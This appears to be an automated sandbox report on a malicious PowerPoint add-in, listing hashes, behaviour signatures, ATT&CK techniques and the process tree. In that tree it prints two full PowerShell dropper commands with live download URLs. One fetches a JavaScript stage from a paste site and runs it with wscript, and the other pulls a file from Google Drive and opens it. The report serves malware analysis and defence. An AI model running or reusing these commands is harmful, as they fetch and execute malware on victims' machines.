3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f

General

Target

3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f.ppam
Size

7KB
MD5

9fb59ca8e5dbe7036ad7bd3e0d64dc46
SHA1

e63989b5046883141c1b5c80ed9dfe12f5146531
SHA256

3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f
SHA512

8ec8ac5cad6a52bc6f11d56f1f276cb187edcdcf90c65cac28b8610549f54b193e957448b5633d0babb06b654c8e35508fb98ed9aaaf37f2ccb06d3600ae4d27
SSDEEP

192:xrXP/xbajZ8EPm/QUN0iIZU0pU3pWBg6HoqBT02:dXP4ruWnK3pWWsLBT7

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pt.textbin.net/download/x7sf6t2dgv

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	5100	3252	powershell.exe	82
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	4672	3252	powershell.exe	82

Blocklisted process makes network request 3 IoCs

flow	pid	Process
6	5100	powershell.exe
7	4672	powershell.exe
11	5100	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5100	powershell.exe
4672	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
6	drive.google.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3252	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
5100	powershell.exe
4672	powershell.exe
5100	powershell.exe
4672	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5100	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3252	POWERPNT.EXE
3252	POWERPNT.EXE
3252	POWERPNT.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3252 wrote to memory of 4672	3252	POWERPNT.EXE	84
PID 3252 wrote to memory of 4672	3252	POWERPNT.EXE	84
PID 3252 wrote to memory of 5100	3252	POWERPNT.EXE	85
PID 3252 wrote to memory of 5100	3252	POWERPNT.EXE	85
PID 4672 wrote to memory of 3996	4672	powershell.exe	88
PID 4672 wrote to memory of 3996	4672	powershell.exe	88

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3252
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command $UmniN;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$UmniN = $uNTnd.DownloadString( 'https://pt.textbin.net/download/x7sf6t2dgv' ) ;$uNTnd = $uNTnd.DownloadString( $UmniN ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;$uNTnd | Out-File -FilePath x.js -force ;wscript.exe x.js ; exit
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4672
- - C:\Windows\system32\wscript.exe
    "C:\Windows\system32\wscript.exe" x.js
    3⤵
    PID:3996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$uNTnd.DownloadFile( 'https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4', [System.IO.Path]::GetTempPath() + 'x.pptx' ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;start x.pptx ; exit
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5100

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
51aa87521f685fa8d4f4bdbd7684a350

SHA1
fd4027d9b24c41461525b0f3f764aa6b2ddd5803

SHA256
6e9453d9cff64f88f0a0b0b5cda807f7deac354120724137e7426871401ea0d6

SHA512
637f0b4c94abb0bcf0bbf21ec2d328eccbf1bd6a37c5dbd309cd428f5aaab08d0f6102a8f45c09372fba57c034fc88ed7950c9afe366583cd5f636ee0b974947

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yzoed0z0.qky.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.js

Filesize
1KB

MD5
445d124223ce3f0e08a0ae4058c43785

SHA1
f86d49541baa26af050371595a0ae86eeb1a9944

SHA256
e7aaad63724fe31051a2321cdb30e760bbfabb4f6cc2606a41fa1c18719ce87b

SHA512
07bd5136ea8d1f1933ed3b96fa724ad65a70a0cf74f2162cff9d3689d5facee84e081036ac71eacf3569c8dfb53c103acedcca0f11f7914630494edbb371ce13

Download Submit
memory/3252-13-0x00007FFA142E0000-0x00007FFA142F0000-memory.dmp

Filesize
64KB

Download
memory/3252-19-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

Filesize
2.0MB

Download
memory/3252-5-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

Filesize
2.0MB

Download
memory/3252-7-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

Filesize
64KB

Download
memory/3252-8-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

Filesize
2.0MB

Download
memory/3252-10-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

Filesize
2.0MB

Download
memory/3252-12-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

Filesize
2.0MB

Download
memory/3252-11-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

Filesize
2.0MB

Download
memory/3252-2-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

Filesize
64KB

Download
memory/3252-9-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

Filesize
2.0MB

Download
memory/3252-14-0x00007FFA142E0000-0x00007FFA142F0000-memory.dmp

Filesize
64KB

Download
memory/3252-6-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

Filesize
2.0MB

Download
memory/3252-18-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

Filesize
2.0MB

Download
memory/3252-64-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

Filesize
2.0MB

Download
memory/3252-63-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

Filesize
2.0MB

Download
memory/3252-4-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

Filesize
64KB

Download
memory/3252-0-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

Filesize
64KB

Download
memory/3252-1-0x00007FFA16810000-0x00007FFA16820000-memory.dmp

Filesize
64KB

Download
memory/3252-3-0x00007FFA5682D000-0x00007FFA5682E000-memory.dmp

Filesize
4KB

Download
memory/5100-47-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

Filesize
2.0MB

Download
memory/5100-26-0x0000016A76790000-0x0000016A767B2000-memory.dmp

Filesize
136KB

Download
memory/5100-20-0x00007FFA56790000-0x00007FFA56985000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads